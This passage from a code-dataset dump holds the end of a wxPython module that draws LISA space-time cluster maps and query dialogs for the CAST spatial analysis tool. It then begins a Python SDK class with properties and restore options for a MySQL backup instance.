> 0:\n x = x - w\n else:\n x = self.bufferWidth - w\n if y + h > self.bufferHeight: \n if y - h > 0:\n y = y - h\n else:\n y = self.bufferHeight - h\n \n dc.SetPen(wx.TRANSPARENT_PEN)\n dc.SetBrush(wx.Brush(wx.Color(120,120,120,160)))\n dc.DrawRectangle(x+5,y+h, w, 5)\n dc.DrawRectangle(x+w,y+5, 5, h)\n dc.SetPen(wx.Pen(wx.Color(100,100,100,100)))\n dc.SetBrush(wx.TRANSPARENT_BRUSH)\n dc.DrawRectangle(x,y,w,h)\n \n self.popupTrendGraph.bufferWidth = w\n self.popupTrendGraph.bufferHeight = h\n self.popupTrendGraph.buffer = wx.EmptyBitmapRGBA(w,h,255,255,255,222)\n tmp_dc = wx.BufferedDC(None, self.popupTrendGraph.buffer)\n if not 'Linux' in stars.APP_PLATFORM \\\n and 'Darwin' != stars.APP_PLATFORM:\r\n tmp_dc = wx.GCDC(tmp_dc)\n self.popupTrendGraph.DoDraw(tmp_dc)\n dc.DrawBitmap(self.popupTrendGraph.buffer,x,y)\n \n \n def OnSize(self,event):\n \"\"\"\n overwrite OnSize in ShapeMap.py\n \"\"\"\n self.bufferWidth,self.bufferHeight = self.GetClientSize()\n if self.bufferHeight > 0:\n if self.bStrip == False:\n self.view.pixel_height = self.bufferHeight\n else:\n self.view.pixel_height = self.bufferHeight - self.bufferHeight/3.0\n self.view.pixel_width = self.bufferWidth\n self.view.init()\n if self.bStrip: \n self.stripBuffer = None\n self.reInitBuffer = True\r\n \n def OnMotion(self, event):\n \"\"\"\n \"\"\"\n if self.bStrip:\n mouse_end_x, mouse_end_y = (event.GetX(), event.GetY())\n # check for left\n if self.nav_left:\n if self.nav_left[0] <= mouse_end_x <= self.nav_left[2] and \\\n self.nav_left[1] <= mouse_end_y <= 
self.nav_left[3]:\n return\n # determine for right \n if self.nav_right:\n if self.nav_right[0] <= mouse_end_x <= self.nav_right[2] and \\\n self.nav_right[1] <= mouse_end_y <= self.nav_right[3]:\n return\n \n if event.Dragging() and event.LeftIsDown() and self.isMouseDrawing:\n x, y = event.GetX(), event.GetY() \n # while mouse is down and moving\n if self.map_operation_type == stars.MAP_OP_PAN:\n # disable PAN (not support in this version)\n return\n \n # give the rest task to super class\n super(LISASpaceTimeMap,self).OnMotion(event)\n \n def Update(self, tick):\n \"\"\"\n When SLIDER is dragged\n \"\"\"\n self.updateDraw(tick) \n\n def updateDraw(self,tick):\n \"\"\"\n Called for dynamic updating the map content\n \"\"\"\n self.tick = tick\n ml = self.space_moran_locals[tick]\n \n # 0 not significant, 1 HH, 2 LL, 3 LH, 4 HL, 5 Neighborless\n sigFlag = ml[2]\n clusterFlag = ml[3]\n lm_sig = np.array(sigFlag)\n lm_q = np.array(clusterFlag)\n id_groups = [[] for i in range(6)]\n for i,sig in enumerate(lm_sig):\n if sig > 0:\n id_groups[lm_q[i]].append(i)\n else:\n id_groups[0].append(i)\n self.id_groups = id_groups\n self.draw_layers[self.layer].set_data_group(id_groups)\n self.draw_layers[self.layer].set_fill_color_group(self.lisa_color_group)\n \n edge_clr = self.color_schema_dict[self.layer.name].edge_color\r\n self.draw_layers[self.layer].set_edge_color(edge_clr)\n \n # trigger to draw \n self.reInitBuffer = True \n self.parentWidget.label_current.SetLabel('current: %d (%d-%s period)' % (tick+1,self.step, self.step_by))\n \n def DoDraw(self, dc):\n \"\"\"\n Overwrite this function from base class for customized drawing\n \"\"\"\n super(LISASpaceTimeMap, self).DoDraw(dc)\n \n if self.bStrip:\n self.drawStripView(dc)\n \n def OnLeftUp(self, event):\n \"\"\" override for click on strip view \"\"\"\n if self.bStrip:\n mouse_end_x, mouse_end_y = (event.GetX(), event.GetY())\n # check for left\n if self.nav_left:\n if self.nav_left[0] <= mouse_end_x <= self.nav_left[0] + self.nav_left[2] and \\\n self.nav_left[1] <= mouse_end_y <= self.nav_left[1] + self.nav_left[3]:\n self.tick = self.tick -1 if self.tick>0 else 0\n self.updateDraw(self.tick)\n # determine for right \n if self.nav_right:\n if self.nav_right[0] <= mouse_end_x <= self.nav_right[0] + self.nav_right[2] and \\\n self.nav_right[1] <= mouse_end_y <= self.nav_right[1] + self.nav_right[3]:\n self.tick = self.tick +1 if self.tick<=self.n else self.tick\n self.updateDraw(self.tick)\n \n # give the rest task to super class\n super(LISASpaceTimeMap,self).OnLeftUp(event)\n \n def drawStripView(self,dc):\n \"\"\"\n For each LISA map at T_i, two related LISA maps at \n T_(i-1) ant T_(i+1) will be displayed in this strip area\n \"\"\"\n n = len(self.data_sel_keys)\n if n <= 1:\n return\n \n start = self.tick\n if start+2 > n:\n return\n end = start + 2\n \n # flag for drawing navigation arrow\n b2LeftArrow = True if self.tick > 0 else False\n b2RightArrow = True if self.tick < n-2 else False\n \n # at area: 0,self.bufferHeight * 2/3.0\n # draw a light gray area at the bottom first\n font = wx.SystemSettings.GetFont(wx.SYS_DEFAULT_GUI_FONT)\n dc.SetFont(font)\n dc.SetPen(wx.TRANSPARENT_PEN)\n brush = wx.Brush(stars.STRIP_VIEW_BG_COLOR)\n dc.SetBrush(brush)\n framePos = 0, self.bufferHeight * 2.0/3.0\n dc.DrawRectangle(framePos[0],framePos[1], self.bufferWidth, self.bufferHeight/3.0)\n \n # calculate width and height for each bmp\n bmpFrameWidth = self.bufferWidth / 2.0 # frame is divided into 2 parts\n bmpFrameHeight = self.bufferHeight / 
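# --- Illustrative aside (not part of the record): the navigation-arrow hit test used in
# OnMotion/OnLeftUp nearby is a plain point-in-rectangle check; this isolates it using the
# (x, y, w, h) tuple layout that OnLeftUp reads.
def hit(rect, mx, my):
    x, y, w, h = rect
    return x <= mx <= x + w and y <= my <= y + h

print(hit((0, 0, 20, 100), 10, 50))   # -> True
print(hit((0, 0, 20, 100), 30, 50))   # -> False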
3.0\n bmpWidth = bmpFrameWidth * 0.6\n bmpHeight = bmpFrameHeight * 0.8\n bmpOffsetX = (bmpFrameWidth - bmpWidth )/2.0 \n bmpOffsetY = (bmpFrameHeight- bmpHeight)/2.0 \n\n # draw text for center large graph\n start_date, end_date = self.datetime_intervals[self.tick]\n if isinstance(start_date, datetime.date):\n info_tip = \"t%d:(%d/%d/%d-%d/%d/%d)\" % \\\n (self.tick+1,start_date.month,start_date.day,start_date.year,\n end_date.month, end_date.day, end_date.year)\n else:\n info_tip = \"t%d - t%d\" % (start_date, end_date)\n txt_w,txt_h = dc.GetTextExtent(info_tip)\r\n dc.DrawText(info_tip, (self.bufferWidth - txt_w)/2, framePos[1] - txt_h)\n \n \n # draw two related LISA maps in strip area\n dc.SetBrush(wx.Brush(stars.STRIP_VIEW_MAP_BG_COLOR))\n #for i in range(start, end):\n if self.tick - 1 >= 0:\n start_pos = bmpOffsetX, framePos[1]+bmpOffsetY \n dc.DrawRectangle(start_pos[0], start_pos[1], bmpWidth, bmpHeight)\n bmp = wx.EmptyBitmapRGBA(\n bmpFrameWidth, bmpFrameHeight,\n red = stars.STRIP_VIEW_BG_COLOR.red,\n green = stars.STRIP_VIEW_BG_COLOR.green,\n blue = stars.STRIP_VIEW_BG_COLOR.blue,\n alpha = stars.STRIP_VIEW_BG_COLOR.alpha\n )\n bmp = self.drawSubLISAMap(self.tick-1,bmpWidth, bmpHeight, bmp)\n dc.DrawBitmap(bmp, start_pos[0], start_pos[1])\n start_date, end_date = self.datetime_intervals[self.tick-1]\n if isinstance(start_date, datetime.date):\n info_tip = \"t%d:(%d/%d/%d-%d/%d/%d)\" % \\\n (self.tick,start_date.month,start_date.day,start_date.year,\n end_date.month, end_date.day, end_date.year)\n else:\n info_tip = \"t%d - t%d\" % (start_date, end_date)\n txt_w,txt_h = dc.GetTextExtent(info_tip)\r\n dc.DrawText(info_tip, start_pos[0] + (bmpWidth - txt_w)/2, start_pos[1]+bmpHeight+2)\n \n if self.tick + 1 < self.t:\n start_pos = bmpFrameWidth + bmpOffsetX , framePos[1]+bmpOffsetY \n dc.DrawRectangle(start_pos[0], start_pos[1], bmpWidth, bmpHeight)\n bmp = wx.EmptyBitmapRGBA(\n bmpFrameWidth, bmpFrameHeight,\n red = stars.STRIP_VIEW_BG_COLOR.red,\n green = stars.STRIP_VIEW_BG_COLOR.green,\n blue = stars.STRIP_VIEW_BG_COLOR.blue,\n alpha = stars.STRIP_VIEW_BG_COLOR.alpha\n )\n bmp = self.drawSubLISAMap(self.tick+1,bmpWidth, bmpHeight, bmp)\n dc.DrawBitmap(bmp, start_pos[0], start_pos[1])\n start_date, end_date = self.datetime_intervals[self.tick+1]\n if isinstance(start_date, datetime.date):\n info_tip = \"t%d:(%d/%d/%d-%d/%d/%d)\" % \\\n (self.tick+2,start_date.month,start_date.day,start_date.year,\n end_date.month, end_date.day, end_date.year)\n else:\n info_tip = \"t%d - t%d\" % (start_date, end_date)\n txt_w,txt_h = dc.GetTextExtent(info_tip)\r\n dc.DrawText(info_tip, start_pos[0] + (bmpWidth - txt_w)/2, start_pos[1]+bmpHeight+2)\n \n # draw navigation arrows\n arrow_y = framePos[1] + bmpFrameHeight/2.0\n \n dc.SetFont(wx.Font(stars.NAV_ARROW_FONT_SIZE, wx.NORMAL, wx.NORMAL, wx.NORMAL))\n dc.SetBrush(wx.Brush(stars.STRIP_VIEW_NAV_BAR_BG_COLOR))\n dc.SetPen(wx.WHITE_PEN)\n if b2LeftArrow:\n self.nav_left = framePos[0], framePos[1], 20, self.bufferHeight/3.0\n dc.DrawRectangle(self.nav_left[0], self.nav_left[1], self.nav_left[2], self.nav_left[3])\n dc.SetPen(wx.WHITE_PEN)\n dc.DrawText(\"<<\", framePos[0]+3, arrow_y)\n else:\n self.nav_left = None\n \n if b2RightArrow:\n self.nav_right = framePos[0]+self.bufferWidth - 20,framePos[1], 20, self.bufferHeight/3.0\n dc.DrawRectangle(self.nav_right[0], self.nav_right[1], self.nav_right[2], self.nav_right[3])\n dc.SetPen(wx.WHITE_PEN)\n dc.DrawText(\">>\", self.bufferWidth-15, arrow_y)\n else:\n self.nav_right = None\n \n def 
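# --- Illustrative aside (not part of the record): the bucketing used in updateDraw above
# and repeated in drawSubLISAMap below. LISA codes: 0 not significant, 1 HH, 2 LL, 3 LH,
# 4 HL, 5 neighborless; the significance and cluster arrays here are made up.
import numpy as np

sig = np.array([1, 0, 1, 1, 0])       # significance flags (made up)
quad = np.array([1, 3, 2, 4, 1])      # cluster codes (made up)
id_groups = [[] for _ in range(6)]
for i, s in enumerate(sig):
    id_groups[quad[i] if s > 0 else 0].append(i)
print(id_groups)                      # -> [[1, 4], [0], [2], [], [3], []]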
drawSubLISAMap(self, idx, bufferWidth, bufferHeight,bmp):\n \"\"\"\n Draw two relative LISa maps for current LISA map\n \"\"\"\n dc = wx.BufferedDC(None, bmp)\n dc.SetBrush(wx.WHITE_BRUSH)\n dc.SetPen(wx.TRANSPARENT_PEN)\n dc.DrawRectangle(0,0,bufferWidth,bufferHeight)\n \n if not \"Linux\" in stars.APP_PLATFORM:\n # not good drawing effect using GCDC in linux\r\n dc = wx.GCDC(dc)\n \n view = View2ScreenTransform(\n self.extent, \n bufferWidth, \n bufferHeight\n ) \n \n moran_local = self.space_moran_locals[idx]\n sigFlag = moran_local[2]\n clusterFlag = moran_local[3]\n lm_sig = np.array(sigFlag)\n lm_q = np.array(clusterFlag)\n id_groups = [[] for i in range(6)]\n # 0 not significant, 1 HH, 2 LL, 3 LH, 4 HL, 5 Neighborless\n for i,sig in enumerate(lm_sig):\n if sig > 0:\n id_groups[lm_q[i]].append(i)\n else:\n id_groups[0].append(i)\n \n from stars.visualization.maps.BaseMap import PolygonLayer\n draw_layer = PolygonLayer(self, self.layer, build_spatial_index=False)\n #edge_clr = wx.Colour(200,200,200, self.opaque)\n edge_clr = self.color_schema_dict[self.layer.name].edge_color\r\n draw_layer.set_edge_color(edge_clr)\n draw_layer.set_data_group(id_groups)\n draw_layer.set_fill_color_group(self.lisa_color_group)\n draw_layer.draw(dc, view) \n \n return bmp\n \n def OnRightUp(self,event):\n menu = wx.Menu()\n menu.Append(210, \"Select Neighbors\", \"\")\r\n menu.Append(211, \"Cancel Select Neighbors\", \"\")\r\n menu.Append(212, \"Toggle internal popup window\", \"\")\r\n #menu.Append(212, \"Show external popup time LISA\", \"\")\r\n \n menu.UpdateUI()\n menu.Bind(wx.EVT_MENU, self.select_by_weights, id=210)\r\n menu.Bind(wx.EVT_MENU, self.cancel_select_by_weights, id=211)\r\n menu.Bind(wx.EVT_MENU, self.showInternalPopupTimeLISA, id=212)\r\n #menu.Bind(wx.EVT_MENU, self.showExtPopupTimeLISA, id=212)\r\n self.PopupMenu(menu)\n \n event.Skip() \n \n \nclass LISASpaceTimeQueryDialog(DynamicLISAQueryDialog):\n \"\"\"\n Query Dialog for generating LISA Space Time Maps\n \"\"\"\n def Add_Customized_Controls(self):\n x2,y2 = 20, 350\n wx.StaticBox(\n self.panel, -1, \"LISA setting:\",pos=(x2,y2),size=(325,70))\n wx.StaticText(self.panel, -1, \"Weights file:\",pos =(x2+10,y2+30),size=(90,-1))\n self.txt_weight_path = wx.TextCtrl(\n self.panel, -1, \"\",pos=(x2+100,y2+30), size=(180,-1) )\n #open_bmp = wx.ArtProvider.GetBitmap(wx.ART_FILE_OPEN, wx.ART_TOOLBAR, (16,16))\n open_bmp = wx.BitmapFromImage(stars.OPEN_ICON_IMG)\n \n self.btn_weight_path = wx.BitmapButton(\n self.panel,-1, open_bmp, pos=(x2+292,y2+32), style=wx.NO_BORDER)\n \n self.Bind(wx.EVT_BUTTON, self.BrowseWeightFile, self.btn_weight_path)\n \n def ShowPopupMenu(self, event):\n \"\"\"\n popup menu for checklist box\n \"\"\"\n menu = wx.Menu()\r\n menu.Append(101, \"Select all transitions\", \"\")\r\n menu.Append(102, \"De-select all transitions\", \"\")\r\n menu.Bind(wx.EVT_MENU, self.EvtSelectAllCheckList, id=101)\r\n menu.Bind(wx.EVT_MENU, self.EvtDeselectAllCheckList, id=102)\r\n menu.UpdateUI()\r\n \n self.PopupMenu(menu)\r\n \n def EvtSelectAllCheckList(self, event):\n self.lm_labels = []\n checked_list = []\n for i in range(len(self.lm_filter_lables)):\n self.lb.SetSelection(i)\n self.lm_labels.append(i+1)\n checked_list.append(i)\n self.lb.SetChecked(checked_list)\n \n def EvtDeselectAllCheckList(self, event):\n for i in range(len(self.lm_filter_lables)):\n self.lb.SetSelection(i, False)\n self.lm_labels.append(i+1)\n self.lm_labels = []\n self.lb.SetChecked([])\n \n def EvtCheckListBox(self, event):\n index = 
event.GetSelection()\n label = self.lb.GetString(index)\n self.lb.SetSelection(index)\n \n if self.lm_labels.count(index+1):\n self.lm_labels.remove(index+1)\n else:\n self.lm_labels.append(index+1)\n \n def OnQuery(self,event):\n if self._check_time_itv_input() == False or\\\n self._check_weight_path() == False or\\\n self._check_space_input() == False:\n return\n self.current_selected = range(self.dbf.n_records)\n self._filter_by_query_field()\n self.query_date = None \n self._filter_by_date_interval()\n self._filter_by_tod()\n self.query_data = self.gen_date_by_step()\n if self.query_data == None or len(self.query_data) <= 1:\n self.ShowMsgBox(\"LISA Space Time Cluster Map requires at least 2 time intervals, please reselect step-by parameters.\")\n return\n # LISA layer (only one)\n lisa_layer = [self.background_shps[self.background_shp_idx]]\n gi_widget = DynamicMapWidget(\n self.parent,\n lisa_layer,\n LISASpaceTimeMap,\n weight=self.weight_path,\n query_data=self.query_data,\n size=(800,650),\n start= self._wxdate2pydate(self.itv_start_date.GetValue()),\n end= self._wxdate2pydate(self.itv_end_date.GetValue()),\n step_by=self.step_by,\n step=self.step+1\n )\n gi_widget.Show()\n \n # (enable) save LISA Markov to new shp/dbf files\n #self.btn_save.Enable(True)\n #self.lisa_layer = lisa_layer[0]\n #self.lisa_markov_map = gi_widget.map_canvas\n \n def OnSaveQueryToDBF(self, event):\n \"\"\"\n Save Markov type in each interval for each record to dbf file.\n \"\"\"\n if self.query_data == None:\n return\n \n dlg = wx.FileDialog(\n self, \n message=\"Save Markov LISA type to new dbf file...\", \n defaultDir=os.getcwd(), \n defaultFile='%s.shp' % (self.lisa_layer.name + '_markov_lisa'), \n wildcard=\"shape file (*.shp)|*.shp|All files (*.*)|*.*\", \n style=wx.SAVE\n )\n if dlg.ShowModal() != wx.ID_OK:\n return\n \n path = dlg.GetPath()\n dbf = self.lisa_layer.dbf\n try:\n n_intervals = self.lisa_markov_map.t -1\n n_objects = len(dbf)\n lisa_markov_mt = self.lisa_markov_map.lisa_markov_mt\n \n newDBF= pysal.open('%s.dbf'%path[:-4],'w')\n newDBF.header = []\n newDBF.field_spec = []\n for i in dbf.header:\n newDBF.header.append(i)\n for i in dbf.field_spec:\n newDBF.field_spec.append(i)\n \n for i in range(n_intervals):\n newDBF.header.append('MARKOV_ITV%d'%(i+1))\n newDBF.field_spec.append(('N',4,0))\n \n for i in range(n_objects): \n newRow = []\n newRow = [item for item in dbf[i][0]]\n for j in range(n_intervals):\n move_type = lisa_markov_mt[i][j]\n newRow.append(move_type)\n \n newDBF.write(newRow)\n newDBF.close()\n \n self.ShowMsgBox(\"Query results have been saved to new dbf file\",\n mtype='CAST Information',\n micon=wx.ICON_INFORMATION)\n except:\n self.ShowMsgBox(\"Saving query results to dbf file failed. 
Please check if the dbf file already exists.\")\n \n \ndef ShowLISASpaceTimeMap(self):\n # self is Main.py\n if not self.shapefiles or len(self.shapefiles) < 1:\n return\n shp_list = [shp.name for shp in self.shapefiles]\n dlg = wx.SingleChoiceDialog(\n self, \n 'Select a POINT or Polygon(with time field) shape file:', \n 'LISA Space Time Map', \n shp_list,\n wx.CHOICEDLG_STYLE)\n if dlg.ShowModal() == wx.ID_OK:\n idx = dlg.GetSelection()\n shp = self.shapefiles[idx]\n background_shapes = FilterShapeList(self.shapefiles, stars.SHP_POLYGON)\n if shp.shape_type == stars.SHP_POINT:\n # create Markov LISA from points\n gi_dlg = LISASpaceTimeQueryDialog(\n self,\"LISA Space Time:\" + shp.name,\n shp, \n background_shps=background_shapes,\n size=stars.DIALOG_SIZE_QUERY_MARKOV_LISA)\n gi_dlg.Show()\n elif shp.shape_type == stars.SHP_POLYGON:\n # bring up a dialog and let user select \n # the time field in POLYGON shape file\n dbf_field_list = shp.dbf.header \n timedlg = wx.MultiChoiceDialog(\n self, 'Select TIME fields to generate LISA Space Time map:', \n 'DBF fields view', \n dbf_field_list)\n if timedlg.ShowModal() == wx.ID_OK:\n selections = timedlg.GetSelections()\n # compose lisa_data_dict\n dbf = shp.dbf\n lisa_data_dict = {}\n count = 0\n for idx in selections:\n lisa_data_dict[count] = np.array(dbf.by_col(dbf.header[idx]))\n count += 1 \n # select weight file\n wdlg = wx.FileDialog(\n self, message=\"Select a weights file\",\n wildcard=\"Weights file (*.gal,*.gwt)|*.gal;*.gwt|All files (*.*)|*.*\",\n style=wx.OPEN | wx.CHANGE_DIR)\n if wdlg.ShowModal() == wx.ID_OK:\n # todo: select filter\n weight_path = wdlg.GetPath()\n # directly show Markov LISA Map\n gi_spacetime_widget= DynamicMapWidget(\n self, \n [shp], \n LISASpaceTimeMap,\n weight = weight_path,\n query_data = lisa_data_dict,\n size =stars.MAP_SIZE_MARKOV_LISA,\n start=1,\n end=count-1,\n step_by='',\n step=1)\n gi_spacetime_widget.Show()\n wdlg.Destroy()\n timedlg.Destroy()\n else:\n self.ShowMsgBox(\"File type error. 
Should be a POINT or POLYGON shapefile.\")\n dlg.Destroy()\n return\n dlg.Destroy() ","repo_name":"GeoDaCenter/CAST","sub_path":"stars/visualization/maps/LISASpaceTime.py","file_name":"LISASpaceTime.py","file_ext":"py","file_size_in_byte":31294,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"21"} +{"seq_id":"34875519443","text":"from __future__ import unicode_literals\nfrom ..instance import Instance\nfrom ..exception import SDKException\n\n\nclass MYSQLInstance(Instance):\n \"\"\"\n Class to represent a standalone MYSQL Instance\n \"\"\"\n\n def __init__(self, agent_object, instance_name, instance_id=None):\n \"\"\"Initialise the Subclient object.\n\n Args:\n agent_object (object) -- instance of the Agent class\n\n instance_name (str) -- name of the instance\n\n instance_id (str) -- id of the instance\n\n default: None\n\n Returns:\n object - instance of the MYSQLInstance class\n\n \"\"\"\n self._browse_restore_json = None\n self._commonoption_restore_json = None\n self._destination_restore_json = None\n self._fileoption_restore_json = None\n self._instance = None\n self.admin_option_json = None\n self.mysql_restore_json = None\n super(MYSQLInstance, self).__init__(agent_object, instance_name, instance_id)\n\n @property\n def port(self):\n \"\"\"Returns the MySQL Server Port number.\n\n Returns:\n (str) -- MySql server port number\n\n \"\"\"\n return self._properties.get('mySqlInstance', {}).get('port', None)\n\n @property\n def mysql_username(self):\n \"\"\"Returns the MySQL Server username.\n\n Returns:\n (str) -- MySql server SA username\n\n \"\"\"\n return self._properties.get('mySqlInstance', {}).get('SAUser', {}).get('userName', None)\n\n @property\n def nt_username(self):\n \"\"\"Returns the MySQL Server nt username.\n\n Returns:\n (str) -- MySql server NT username\n\n \"\"\"\n return self._properties.get('mySqlInstance', {}).get('NTUser', {}).get('userName', None)\n\n @property\n def config_file(self):\n \"\"\"Returns the MySQL Server Config File location.\n\n Returns:\n (str) -- MySql server config file location\n\n \"\"\"\n return self._properties.get('mySqlInstance', {}).get('ConfigFile', None)\n\n @property\n def binary_directory(self):\n \"\"\"Returns the MySQL Server Binary File location.\n\n Returns:\n (str) -- MySql server binary directory\n\n \"\"\"\n return self._properties.get('mySqlInstance', {}).get('BinaryDirectory', None)\n\n @property\n def version(self):\n \"\"\"Returns the MySQL Server version number.\n\n Returns:\n (str) -- MySql server version\n\n \"\"\"\n return self._properties.get('mySqlInstance', {}).get('version', None)\n\n @property\n def log_data_directory(self):\n \"\"\"Returns the MySQL Server log data directory.\n\n Returns:\n (str) -- MySql server log directory path\n\n \"\"\"\n return self._properties.get('mySqlInstance', {}).get('LogDataDirectory', None)\n\n @property\n def log_backup_sp_details(self):\n \"\"\"Returns the MySQL Server Log backup SP details\n\n Returns:\n (dict) -- MySql server log backup storage policy information\n\n \"\"\"\n log_storage_policy_name = self._properties.get('mySqlInstance', {}).get(\n 'logStoragePolicy', {}).get('storagePolicyName', None)\n log_storage_policy_id = self._properties.get('mySqlInstance', {}).get(\n 'logStoragePolicy', {}).get('storagePolicyId', None)\n\n log_sp = {\"storagePolicyName\": log_storage_policy_name,\n \"storagePolicyId\": log_storage_policy_id}\n return log_sp\n\n @property\n def command_line_sp_details(self):\n \"\"\"Returns the MySQL Server 
commandline SP details.\n\n Returns:\n (dict) -- MySql server commnadline storage policy information\n\n \"\"\"\n cmd_storage_policy_name = self._properties.get('mySqlInstance', {}).get(\n 'mysqlStorageDevice', {}).get('commandLineStoragePolicy', {}).get(\n 'storagePolicyName', None)\n cmd_storage_policy_id = self._properties.get('mySqlInstance', {}).get(\n 'mysqlStorageDevice', {}).get('commandLineStoragePolicy', {}).get(\n 'storagePolicyId', None)\n\n command_sp = {\"storagePolicyName\": cmd_storage_policy_name,\n \"storagePolicyId\": cmd_storage_policy_id}\n return command_sp\n\n @property\n def autodiscovery_enabled(self):\n \"\"\"Returns the MySQL Server auto discovery enabled flag\n\n Returns:\n (bool) -- True if auto discovery enabled\n False if auto discovery not enabled\n\n \"\"\"\n return self._properties.get('mySqlInstance', {}).get('EnableAutoDiscovery', False)\n\n @property\n def xtrabackup_bin_path(self):\n \"\"\"Returns the MySQL Server xtrabackup bin path\n\n Returns:\n (str) -- MySql server xtrabackup binary path\n\n \"\"\"\n return self._properties.get(\n 'mySqlInstance', {}).get(\n 'xtraBackupSettings', {}).get('xtraBackupBinPath', \"\")\n\n @property\n def is_xtrabackup_enabled(self):\n \"\"\"Returns the MySQL Server xtrabackup enabled flag\n\n Returns:\n (bool) -- True if xtrabackup is enabled\n False if xtrabackup is not enabled\n\n \"\"\"\n return self._properties.get(\n 'mySqlInstance', {}).get(\n 'xtraBackupSettings', {}).get('enableXtraBackup', False)\n\n @property\n def proxy_options(self):\n \"\"\"Returns the MySQL Server proxy options\n\n Returns:\n (dict) -- MySql server proxy information\n\n \"\"\"\n proxy_settings = self._properties.get('mySqlInstance', {}).get('proxySettings', {})\n proxy_opt = {\n \"isUseSSL\": proxy_settings.get('isUseSSL', False),\n \"isProxyEnabled\": proxy_settings.get('isProxyEnabled', False),\n \"runBackupOnProxy\": proxy_settings.get('runBackupOnProxy', False),\n \"instanceId\": proxy_settings.get('proxyInstance', {}).get('instanceId', None),\n \"instanceName\": proxy_settings.get('proxyInstance', {}).get('instanceName', None),\n \"clientId\": proxy_settings.get('proxyInstance', {}).get('clientId', None),\n \"clientName\": proxy_settings.get('proxyInstance', {}).get('clientName', None)}\n return proxy_opt\n\n @property\n def mysql_enterprise_backup_binary_path(self):\n \"\"\" Returns the MySQL Enterprise backup binary path detail\n\n Return Type: dict\n\n \"\"\"\n meb_settings = self._properties.get('mySqlInstance', {}).get('mebSettings', {})\n return meb_settings\n\n @mysql_enterprise_backup_binary_path.setter\n def mysql_enterprise_backup_binary_path(self, value):\n \"\"\" Setter for MySQL Enterprise backup binary path\n\n Args:\n\n value (str) -- Contains the MySQL Enterprise backup binary path to be updated\n in MySQL Instance property\n\n \"\"\"\n if not isinstance(value, str):\n raise SDKException('Instance', '101')\n properties = self._properties\n meb_bin_path_update = {\n \"enableMEB\": False if value == '' else True,\n \"mebBinPath\": value\n }\n properties['mySqlInstance']['mebSettings'] = meb_bin_path_update\n self.update_properties(properties)\n\n @property\n def no_lock_status(self):\n \"\"\" Returns the status of No Lock Checkbox in MySQL Instance\n\n Returns:\n (bool) -- True if No Lock checkbox is enabled\n False if No Lock checkbox is disabled\n\n \"\"\"\n return self._properties.get('mySqlInstance', {}).get('EnableNoLocking', False)\n\n @no_lock_status.setter\n def no_lock_status(self, value):\n \"\"\" Setter for 
No Lock property in MySQL Instance\n\n Args:\n\n value (bool) -- True or False to enable or disable the No Lock\n property in MySQL Instance\n\n \"\"\"\n if not isinstance(value, bool):\n raise SDKException('Instance', '101')\n properties = self._properties\n properties['mySqlInstance']['EnableNoLocking'] = value\n self.update_properties(properties)\n\n @property\n def ssl_enabled(self):\n \"\"\" Returns(boolean) True/False based on SSL status \"\"\"\n return self._properties.get('mySqlInstance', {}).get('sslEnabled', False)\n\n def _get_instance_properties(self):\n \"\"\"Gets the properties of this instance.\n\n Raises:\n SDKException:\n if response is empty\n\n if response is not success\n\n \"\"\"\n super(MYSQLInstance, self)._get_instance_properties()\n self._instance = {\n \"type\": 0,\n \"clientName\": self._agent_object._client_object.client_name,\n \"clientSidePackage\": True,\n \"subclientName\": \"\",\n \"backupsetName\": \"defaultDummyBackupSet\",\n \"instanceName\": self.instance_name,\n \"appName\": self._agent_object.agent_name,\n \"consumeLicense\": True\n }\n\n def _restore_json(self, **kwargs):\n \"\"\"Returns the JSON request to pass to the API as per the options selected by the user.\n\n Args:\n kwargs (list) -- list of options need to be set for restore\n\n Returns:\n dict - JSON request to pass to the API\n\n \"\"\"\n rest_json = super(MYSQLInstance, self)._restore_json(**kwargs)\n restore_option = {}\n if kwargs.get(\"restore_option\"):\n restore_option = kwargs[\"restore_option\"]\n for key in kwargs:\n if not key == \"restore_option\":\n restore_option[key] = kwargs[key]\n else:\n restore_option.update(kwargs)\n\n if restore_option[\"from_time\"] is None:\n restore_option[\"from_time\"] = {}\n\n if restore_option[\"to_time\"] is None:\n restore_option[\"to_time\"] = {}\n\n self._restore_admin_option_json(restore_option)\n self._restore_mysql_option_json(restore_option)\n rest_json[\"taskInfo\"][\"subTasks\"][0][\"options\"][\"restoreOptions\"][\n \"mySqlRstOption\"] = self.mysql_restore_json\n rest_json[\"taskInfo\"][\"subTasks\"][0][\"options\"][\"adminOpts\"] = self.admin_option_json\n return rest_json\n\n def restore_in_place(\n self,\n path=None,\n staging=None,\n dest_client_name=None,\n dest_instance_name=None,\n data_restore=True,\n log_restore=False,\n overwrite=True,\n copy_precedence=None,\n from_time=None,\n to_time=None,\n media_agent=None,\n table_level_restore=False,\n clone_env=False,\n clone_options=None,\n redirect_enabled=False,\n redirect_path=None,\n browse_jobid=None):\n \"\"\"Restores the mysql data/log files specified in the input paths list to the same location.\n\n Args:\n path (list) -- list of database/databases to be restored\n\n default: None\n\n staging (str) -- staging location for mysql logs during restores\n\n default: None\n\n dest_client_name (str) -- destination client name where files are to be\n restored\n\n default: None\n\n dest_instance_name (str) -- destination mysql instance name of destination\n client\n\n default: None\n\n data_restore (bool) -- for data only/data+log restore\n\n default: True\n\n log_restore (bool) -- for log only/data+log restore\n\n default: False\n\n overwrite (bool) -- unconditional overwrite files during restore\n\n default: True\n\n copy_precedence (int) -- copy precedence value of storage policy copy\n\n default: None\n\n from_time (str) -- time to retore the contents after\n format: YYYY-MM-DD HH:MM:SS\n\n default: None\n\n to_time (str) -- time to retore the contents before\n format: YYYY-MM-DD 
HH:MM:SS\n\n default: None\n\n media_agent (str) -- media agent associated\n\n default: None\n\n table_level_restore (bool) -- Table level restore flag\n\n default: False\n\n clone_env (bool) -- boolean to specify whether the database\n should be cloned or not\n\n default: False\n\n clone_options (dict) -- clone restore options passed in a dict\n\n default: None\n\n Accepted format: {\n \"stagingLocaion\": \"/gk_snap\",\n \"forceCleanup\": True,\n \"port\": \"5595\",\n \"libDirectory\": \"\",\n \"isInstanceSelected\": True,\n \"reservationPeriodS\": 3600,\n \"user\": \"\",\n \"binaryDirectory\": \"/usr/bin\"\n\n }\n\n redirect_enabled (bool) -- boolean to specify if redirect restore is\n enabled\n\n default: False\n\n redirect_path (str) -- Path specified in advanced restore options\n in order to perform redirect restore\n\n default: None\n\n browse_jobid (int) -- Browse jobid to browse and restore from\n\n default: None\n\n Returns:\n object - instance of the Job class for this restore job\n\n Raises:\n SDKException:\n if paths is not a list\n\n if failed to initialize job\n\n if 